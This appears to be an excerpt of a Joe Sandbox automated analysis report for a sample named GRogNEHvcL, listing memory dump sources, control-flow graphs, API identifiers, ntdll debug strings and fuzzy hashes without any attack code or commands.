                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 7 42cf3d-42cf3e 8 42cf40 7->8 9 42cf26-42cf35 7->9 10 42cf42-42cf71 8->10 11 42cef6-42cf1e 8->11 15 42cf73-42cf76 10->15 16 42cf77-42cf81 10->16 13 42cf24 11->13 13->9
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2397807471.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_42c000_GRogNEHvcL.jbxd

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 17 42cb6f-42cb8a 18 42cb99-42cba0 17->18 19 42cbaf-42cbb4 18->19 20 42cc03-42cc08 19->20 21 42cbb6-42cbbf 19->21 22 42cbce-42cbd3 21->22 23 42cbe6-42cc00 22->23 24 42cbd5-42cbdd 22->24 23->20 25 42cbe3 24->25 25->23
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2397807471.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_42c000_GRogNEHvcL.jbxd

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 28 42cb73-42cbb4 31 42cc03-42cc08 28->31 32 42cbb6-42cbd3 28->32 34 42cbe6-42cc00 32->34 35 42cbd5-42cbdd 32->35 34->31 36 42cbe3 35->36 36->34
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2397807471.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_42c000_GRogNEHvcL.jbxd

                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2397807471.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_42c000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:

                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2397807471.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_42c000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:

                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2397807471.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_42c000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: 0Iv$0Iv$0Iv$0Iv$0Iv$0Iv
                                            • API String ID: 3446177414-2083360775

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID:
                                            • API String ID: 48624451-0

                                            Strings
                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01A979D5
                                            • SsHd, xrefs: 01A4A3E4
                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 01A979D0, 01A979F5
                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01A979FA
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                            • API String ID: 0-929470617

                                            APIs
                                            Strings
                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01A99346
                                            • GsHd, xrefs: 01A4D874
                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 01A99341, 01A99366
                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01A9936B
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                            • API String ID: 3446177414-576511823

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $$@
                                            • API String ID: 3446177414-1194432280
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: 0Iv$0Iv$0Iv$X
                                            • API String ID: 3446177414-728256981
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                            • API String ID: 3446177414-56086060
                                            APIs
                                            Strings
                                            • LdrpCheckRedirection, xrefs: 01AB488F
                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01AB4888
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01AB4899
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 3446177414-3154609507
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                            • API String ID: 3446177414-3526935505
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $
                                            • API String ID: 3446177414-3993045852
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes$BaseInitThreadThunk
                                            • String ID:
                                            • API String ID: 4281723722-0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Bl$l
                                            • API String ID: 3446177414-208461968
                                            APIs
                                            • __startOneArgErrorHandling.LIBCMT ref: 01A75E34
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: ErrorHandling__start
                                            • String ID: pow
                                            • API String ID: 3213639722-2276729525
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0$Flst
                                            • API String ID: 0-758220159
                                            • Opcode ID: ce5d105dad00013c0a4d3143cc9e2a0e0bc813c0a77af73eb2539825eb71a765
                                            • Instruction ID: 0b2bf5442e0308c33a8b2cf7b281f710ae9c5b7e8a26c019fca27e0e3fa1db82
                                            • Opcode Fuzzy Hash: ce5d105dad00013c0a4d3143cc9e2a0e0bc813c0a77af73eb2539825eb71a765
                                            • Instruction Fuzzy Hash: 5651ABB1E00219CFCF26DFA9C58466DFBF8FF58714F54802AD1499B255EB709989CB80
                                            APIs
                                            • RtlDebugPrintTimes.NTDLL ref: 01A5D959
                                              • Part of subcall function 01A34859: RtlDebugPrintTimes.NTDLL ref: 01A348F7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $$$
                                            • API String ID: 3446177414-233714265
                                            • Opcode ID: af2d493e6829412fb7dfec3e22979901f3a76ad73cfb3dea98b2d93a45240451
                                            • Instruction ID: 5d65baac50e4c363781b09215e8003c77f0aa41470d1b8121b4990795208a0f3
                                            • Opcode Fuzzy Hash: af2d493e6829412fb7dfec3e22979901f3a76ad73cfb3dea98b2d93a45240451
                                            • Instruction Fuzzy Hash: 3E510071A08346DFDB76DFE8C5847DDBBB1BF48318F284159D809AB295C770A889CB80
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $
                                            • API String ID: 3446177414-3993045852
                                            • Opcode ID: 0cebd74b53a152e2729685dc1c28d7e7d152f71fb6e2b9fa04bf11378f3ec159
                                            • Instruction ID: c85ee2ec80d6211af94d3419648bd635db1f0c21d9afcef85424536581642732
                                            • Opcode Fuzzy Hash: 0cebd74b53a152e2729685dc1c28d7e7d152f71fb6e2b9fa04bf11378f3ec159
                                            • Instruction Fuzzy Hash: 114168B5A00209AFDF26DF99C980AEEBBB5FF48B14F540129EA04A7341D7719D15CBA0
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2398166296.0000000001A26000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                            • Associated: 0000000E.00000002.2398166296.0000000001A00000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A07000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A80000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001A86000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001AC2000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B23000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000E.00000002.2398166296.0000000001B29000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_1a00000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: 0$0
                                            • API String ID: 3446177414-203156872
                                            • Opcode ID: cfd9bf0717d1009ee245f688f192ad9387b00b7564ecc5e527935a320531e75b
                                            • Instruction ID: 8c41ac7f09d893a86771ddd7c6b806140bf4c8fd7bbe43640fa281ab5c1c9415
                                            • Opcode Fuzzy Hash: cfd9bf0717d1009ee245f688f192ad9387b00b7564ecc5e527935a320531e75b
                                            • Instruction Fuzzy Hash: E2417CB16087569FD310CF2CC584A16BBE4BB88314F04492EF988DB342D775EA06CB96